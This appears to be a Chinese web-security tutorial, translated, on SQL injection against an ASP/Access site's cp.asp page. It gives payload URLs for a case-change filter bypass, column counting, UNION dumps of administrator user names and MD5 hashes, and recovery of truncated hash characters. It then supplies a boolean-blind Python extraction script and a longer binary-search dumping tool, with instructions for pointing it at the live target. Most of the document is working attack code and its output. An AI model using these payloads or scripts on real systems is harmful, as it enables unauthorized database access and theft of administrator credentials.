http://www.xxx.cn/cp.asp?classid=3
http://www.xxx.cn/cp.asp?classid=3 and //request blocked: the keyword "and" is filtered
http://www.xxx.cn/cp.asp?classid=3 and 1=1 //keyword filter bypassed by varying the case of "and" (the later payloads use mixed case for the same reason); page renders normally
http://www.xxx.cn/cp.asp?classid=3 and 1=2 //page changes, so classid is injectable and the true/false pages can be told apart
http://www.xxx.cn/cp.asp?classid=3 ORDER by 8%16 //normal
http://www.xxx.cn/cp.asp?classid=3 ORDER by 9%16 //error: the original query has 8 columns
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,2,3,4,5,6,7,8 from ADMIN%16 //page renders normally and echoes the value 2: the admin table exists (Access errors on a missing table) and column 2 is the visible column
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,id,3,4,5,6,7,8 from admin%16 //the page shows 4, 5 and 7: three accounts, with ids 4, 5 and 7
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 1 1,admin,3,4,5,6,7,8 from admin%16 //lxiaofu
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 2 1,admin,3,4,5,6,7,8 from admin%16 //admin
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 3 1,admin,3,4,5,6,7,8 from admin%16 //admin8
Or, addressing each row by its id instead of by TOP n:
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin WHERE id=4%16 //lxiaofu
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin WHERE id=5%16 //admin
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin WHERE id=7%16 //admin8
Or again, one query per column, dumping every row at once:
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin%16 //dumps admin, admin8, lxiaofu
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,pwd,3,4,5,6,7,8 from admin%16 //dumps 4817cc8dcbb3fb5, ae0284ccc20bdde, bbd06203b2ba922
Collecting the results so far:
id  admin    pwd
4   lxiaofu  bbd06203b2ba922
5   admin    ae0284ccc20bdde
7   admin8   4817cc8dcbb3fb5
(The name-to-hash pairing in this table is positional: the two one-column dumps are separate, deduplicated UNION results and both came back in alphabetical order, so nothing in them ties a hash to an account. Only a per-row query, UNION SELECT 1,pwd,3,4,5,6,7,8 from admin WHERE id=4 and so on, pins a hash to an id.)
The MD5 values above are only 15 characters long, while an MD5 hex digest is 16 characters (the truncated form) or 32 characters. So first check the length of the pwd field:
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,len(pwd),3,4,5,6,7,8 from ADMIN%16 //returns 16: the stored hash is 16 characters, so the visible column drops the last one
The hash is 16 characters, so extract the 16th character on its own, selecting the row by id:
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,mid(pwd,16,1),3,4,5,6,7,8 from ADMIN WHERE id=4%16 //f
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,mid(pwd,16,1),3,4,5,6,7,8 from ADMIN WHERE id=5%16 //8
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,mid(pwd,16,1),3,4,5,6,7,8 from ADMIN WHERE id=7%16 //c
Or, with a scalar subquery in the visible column:
http://www.xxx.cn/cp.asp?classid=3 UNION Select 1,(select MID(pwd,16,1) from admin WHERE id=4),3,4,5,6,7,8 from admin%16 //f
http://www.xxx.cn/cp.asp?classid=3 UNION Select 1,(select MID(pwd,16,1) from admin WHERE id=5),3,4,5,6,7,8 from admin%16 //8
http://www.xxx.cn/cp.asp?classid=3 UNION Select 1,(select MID(pwd,16,1) from admin WHERE id=7),3,4,5,6,7,8 from admin%16 //c
Collecting the results:
id  admin    pwd
4   lxiaofu  bbd06203b2ba922f
5   admin    4817cc8dcbb3fb58
7   admin8   ae0284ccc20bddec
(This table assigns the 4817... and ae02... prefixes to admin and admin8 the other way round from the earlier table. The per-id queries above fix only the 16th character of each hash; which 15-character prefix belongs to which account has to be confirmed with a per-id query on pwd, in the same WHERE id=... form used for the user names, before the hashes are cracked.)
Or use a blind-injection script. It is boolean-based: the condition ASC((SELECT TOP 1 MID(pwd,i,1) from admin))=<code> is true only for the right character at position i, and the normally rendered page contains the string "?product_id=194" while the false page does not.

import requests

heads = {'user-agent': 'mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:52.0) gecko/20100101 firefox/52.0'}
# characters to try at each position; the original list is garbled in this copy,
# so hex digits, lower-case letters and a few symbols are assumed here
payloads = '0123456789abcdefghijklmnopqrstuvwxyz@_.'
pwd = []
for i in range(1, 17):                      # 16 characters, as LEN(pwd) showed
    for payload in payloads:
        # TOP 1 without ORDER BY takes the first row of admin; ASC() compares the exact character code
        url = "http://www.xxx.cn/cp.asp?classid=24 and ASC((SELECT TOP 1 MID(pwd,{},1) from admin))={}".format(i, ord(payload))
        response = requests.get(url=url, headers=heads).content.decode(encoding='GBK')
        # print(url)
        if "?product_id=194" in response:    # marker present only on the normally rendered (true) page
            pwd.append(payload)
            print('\n', 'pwd is:', payload, end='')
            break
        else:
            print('.', end='')
print('\n[done] pwd:', ''.join(pwd))
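The script above walks the candidate characters one by one and always reads the TOP 1 row. The following is an added example, not the page's script: it generalises the same ASC(MID(pwd,i,1)) probe so that rows are addressed by id (which also settles the name-to-hash pairing), LEN() is measured first so the 16th character is never lost, and each character is found by binary search on ASC() instead of a linear scan. The oracle is a plain callable, so the extraction code is the same whether it talks to the real cp.asp over HTTP or, as here, to a constructed in-memory SQLite stand-in with Access's MID/ASC/LEN functions registered. The table and column names (admin, id, admin, pwd) and the "?product_id=194" marker follow the page; the cp/title table in the stand-in and the sample rows are constructed for the example.

```python
"""Boolean-blind extraction of the admin table, row by row (added example)."""
import sqlite3
from typing import Callable, Dict, List

Oracle = Callable[[str], bool]  # Access boolean expression -> did the page render normally?


def bisect_int(oracle: Oracle, expr: str, lo: int, hi: int) -> int:
    """Value of the integer scalar query `expr`, known to lie in [lo, hi], via `(expr) > n` probes."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr})>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def row_ids(oracle: Oracle, table: str, id_col: str = "id", max_id: int = 32) -> List[int]:
    """Ids present in `table`, one request per candidate (the page found 4, 5 and 7 via UNION)."""
    return [i for i in range(1, max_id + 1)
            if oracle(f"(SELECT COUNT(*) FROM {table} WHERE {id_col}={i})=1")]


def extract_field(oracle: Oracle, table: str, col: str, row_id: int, id_col: str = "id") -> str:
    """Extract `col` of the row whose `id_col` equals `row_id`, one character at a time."""
    row = f"FROM {table} WHERE {id_col}={row_id}"
    length = bisect_int(oracle, f"SELECT LEN({col}) {row}", 0, 255)  # missing row -> NULL -> 0
    chars = []
    for pos in range(1, length + 1):
        # ASC() yields the exact code; comparing the character itself would go through
        # Access's case-insensitive text comparison and confuse 'A' with 'a'.
        code = bisect_int(oracle, f"SELECT ASC(MID({col},{pos},1)) {row}", 0, 255)
        chars.append(chr(code))
    return "".join(chars)


def dump_table(oracle: Oracle, table: str = "admin", cols=("admin", "pwd")) -> Dict[int, Dict[str, str]]:
    """Every row of `table` keyed by id, so name and hash are paired by row, not by dump order."""
    return {rid: {c: extract_field(oracle, table, c, rid) for c in cols}
            for rid in row_ids(oracle, table)}


def http_oracle(base_url: str, get: Callable[[str], str], marker: str = "?product_id=194") -> Oracle:
    """Oracle for a live target: `get(url)` returns the page body (e.g. requests.get(...).content.decode('gbk'));
    `marker` is a string that only the normally rendered page contains, as in the page's script."""
    return lambda condition: marker in get(f"{base_url} and ({condition})")


# --- constructed stand-in for the target, so the code above runs offline ---------------------
SAMPLE_ADMINS = [  # values as in the page's final table; not real credentials
    (4, "lxiaofu", "bbd06203b2ba922f"),
    (5, "admin", "4817cc8dcbb3fb58"),
    (7, "admin8", "ae0284ccc20bddec"),
]


def sqlite_oracle(rows) -> Oracle:
    """Simulate cp.asp: an injectable WHERE clause over a db with Access's MID/ASC/LEN registered."""
    db = sqlite3.connect(":memory:")
    db.create_function("MID", 3, lambda s, start, n: None if s is None else s[start - 1:start - 1 + n])
    db.create_function("ASC", 1, lambda s: None if not s else ord(s[0]))
    db.create_function("LEN", 1, lambda s: None if s is None else len(s))
    db.execute("CREATE TABLE cp (classid INTEGER, title TEXT)")   # constructed product table
    db.execute("INSERT INTO cp VALUES (3, 'product list')")
    db.execute("CREATE TABLE admin (id INTEGER, admin TEXT, pwd TEXT)")
    db.executemany("INSERT INTO admin VALUES (?, ?, ?)", rows)

    def oracle(condition: str) -> bool:
        # The page concatenates classid and whatever follows straight into the WHERE clause.
        sql = f"SELECT title FROM cp WHERE classid=3 and ({condition})"
        return db.execute(sql).fetchone() is not None  # a row back == "normal" page
    return oracle


if __name__ == "__main__":
    for rid, fields in dump_table(sqlite_oracle(SAMPLE_ADMINS)).items():
        print(rid, fields["admin"], fields["pwd"])
```

Against the real target the oracle would be http_oracle("http://www.xxx.cn/cp.asp?classid=3", lambda u: requests.get(u, headers=heads).content.decode("gbk")); every probe then costs one request, about 8 per character and one per candidate id, and the dump comes out already paired by row.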
Web security: ACCESS injection, blind-injection script